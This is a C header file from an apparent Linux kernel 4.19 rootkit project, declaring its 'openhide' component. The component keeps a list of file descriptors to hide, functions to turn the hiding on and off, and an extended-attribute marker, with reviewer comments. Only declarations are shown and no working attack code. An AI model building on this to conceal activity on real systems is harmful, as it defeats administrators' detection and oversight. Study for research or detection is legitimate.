linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

openhide.h (769B)


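/*
 * openhide.h - interface of the rootkit's "openhide" component.
 *
 * Only declarations are visible in this header; the definitions live
 * elsewhere. Judging by the identifiers, the component keeps a list of file
 * descriptors that are to be hidden. Remarks that go beyond what the
 * declarations themselves show are marked as assumptions.
 */
#ifndef _GROUP7_OPENHIDE_H
#define _GROUP7_OPENHIDE_H

#include <linux/types.h>

/*
 * Forward declaration so that the may_fd() prototype below refers to the
 * file-scope `struct file`. Without it, a translation unit that includes
 * this header before <linux/fs.h> declares a distinct struct type that only
 * exists inside the parameter list.
 */
struct file;

/*
 * Converts a decimal string to an int file descriptor number.
 *
 * simple_strtol() is called with a NULL end pointer, so no parse error is
 * ever reported: a non-numeric name yields 0 (a valid descriptor number),
 * trailing characters are ignored, and the long result is truncated by the
 * cast to int. The kernel treats simple_strtol() as obsolete in favour of
 * the checked kstrtoint() family. The macro needs simple_strtol() to be
 * declared at the point of use; this header does not include its declaration.
 */
#define FD_FROM_NAME(name) ((int)simple_strtol((name), NULL, 10))

/*
 * Extended-attribute name and value.
 * NOTE(review): presumably the marker the component looks for on files;
 * confirm against the implementation. For defenders, this literal
 * name/value pair is a cheap host indicator to search for, ideally on an
 * offline image rather than through the possibly hooked running kernel.
 */
#define G7_XATTR_NAME "user.rootkit"
#define G7_XATTR_VAL  "rootkit"

/* Buffer length in bytes; where it is used is not visible in this header. */
#define BUFLEN 512

/*
 * Doubly linked list node holding one file descriptor number.
 * Note that fd_list_t_ptr is a typedef'd pointer, so the prototypes below
 * take and return `struct fd_list *` even though no `*` is written.
 */
typedef struct fd_list *fd_list_t_ptr;
typedef struct fd_list {
    int fd;              /* file descriptor number stored in this node */
    fd_list_t_ptr prev;  /* previous node */
    fd_list_t_ptr next;  /* next node */
} fd_list_t;

/*
 * List object defined in another translation unit.
 * NOTE(review): it is an object rather than a pointer, so it presumably
 * acts as the list head; confirm.
 */
extern fd_list_t hidden_fds;

/* Enable / disable the component (implementation not visible here). */
void hide_open(void);
void unhide_open(void);

/*
 * NOTE(review): the semantics of the returned pid_t and of fill_fds() cannot
 * be determined from the declarations; confirm against the implementation.
 */
pid_t may_fd(struct file *file);
void fill_fds(pid_t pid);

/*
 * List helpers. Parameter names follow the one prototype that already named
 * them (remove_fd_from_list).
 * NOTE(review): which node the pointer-returning helpers return, and what
 * they return on failure, is not visible here.
 */
void clear_hidden_fds(void);
bool list_contains_fd(fd_list_t_ptr list, int fd);

fd_list_t_ptr find_fd_in_list(fd_list_t_ptr list, int fd);
fd_list_t_ptr add_fd_to_list(fd_list_t_ptr list, int fd);
fd_list_t_ptr remove_fd_from_list(fd_list_t_ptr list, int fd);

#endif /* _GROUP7_OPENHIDE_H */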